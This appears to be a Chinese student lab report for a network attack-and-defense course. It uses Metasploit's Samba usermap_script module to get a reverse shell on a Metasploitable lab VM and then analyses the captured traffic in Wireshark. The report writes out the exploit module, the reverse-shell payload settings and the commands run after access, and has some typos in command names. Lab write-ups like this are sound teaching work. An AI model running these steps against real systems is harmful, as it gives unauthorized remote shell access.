20212808 2021-2022-2 《网络攻防实践》实践七报告
20212808 2021-2022-2 《网络攻防实践》实践七报告
1.知识点梳理与总结
1.1 实验内容
(1)使用Metasploit进行Linux远程渗透攻击
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。
(2)实践作业:攻防对抗实践
攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
2.实践过程
2.1 使用Metasploit进行Linux远程渗透攻击
- 查看下IP地址
kali 192.168.200.2
Metasploitable-ubutun 192.168.200.123 - 测试攻击机与靶机能够相互ping通
- Samba开放tcp端口有:139、445端口。打开 kali 并使用 nmap 进行扫描nmap -T4 192.168.200.123,Nmap用于在远程机器上探测网络,执行安全扫描,网络审计和搜寻开放端口。-T4指定扫描过程中使用的时序,级别越高,扫描速度越快,在网络通讯状况良好的情况推荐使用T4。
发现139和445端口已经打开,可以尝试进行攻击 - 在kali打开渗透软件metasploit
- 使用search samba命令从Metasploit渗透代码中找出攻击Samba服务的模块,如下在辅助及渗透攻击模块中,找到针对usermap_script安全漏洞的渗透攻击模块名称为13.exploir/multi/usermap_script
- 通过命令use xploit/multi/samba/usermap_script使用渗透攻击模块
- show payloads会显示出有效的攻击载荷,选择攻击PAYLOAD为远程shell
- 设置攻击的PAYLOAD为set PAYLOAD cmd/unix/reverse,设置攻击机地址LHOSTset LHOST 192.168.200.2,靶机地址RHOSTset RHOST 192.168.200.123,使用命令show options再次查看payload状态
- 执行命令run发起攻击
- 通过命令shell打开shell,(回车),通过id查看shell权限账户及其所在的权限组,通过命令whomai查看当前权限账户
2.2 攻防对抗实践
在实践一 run之前打开wireshark,进行分析
查看攻击发起时间
查看攻击者的IP地址192.168.200.2,端口34775;目标IP192.168.200.123,端口139
由上图也可得出,攻击利用了139端口漏洞。139端口属于TCP服务,Unix中用于Samba服务。开启139端口虽然可以提供共享服务,但是常常被攻击者所利用进行攻击,可以试图获取用户名和密码。
查看攻击成功建立连接使用的shellcode
攻击过程分析:
首先攻击机向靶机发送一个SMB的Negotiate Protocol Request(协商协议请求)数据报,并列出攻击机所支持的SMB协议版本,服务器响应一个SMB的Negotiate Protocol Response(协商协议响应)数据报; (如果无可使用的协议版本则返回0XFFFFH,结束通信。),攻击机向靶机发起一个Session setup X request(会话设置请求)数据报,会话的用户身份为:anonymous(匿名用户),靶机确认身份后发送一个Session Setup X Response(会话设置响应)数据报同意本次连接。
3.学习中遇到的问题及解决
深入理解佛那估计过程分析
4.实践总结
和上周差不多,整体不难,分析内容较难,不够清晰,还是多学习多实践。
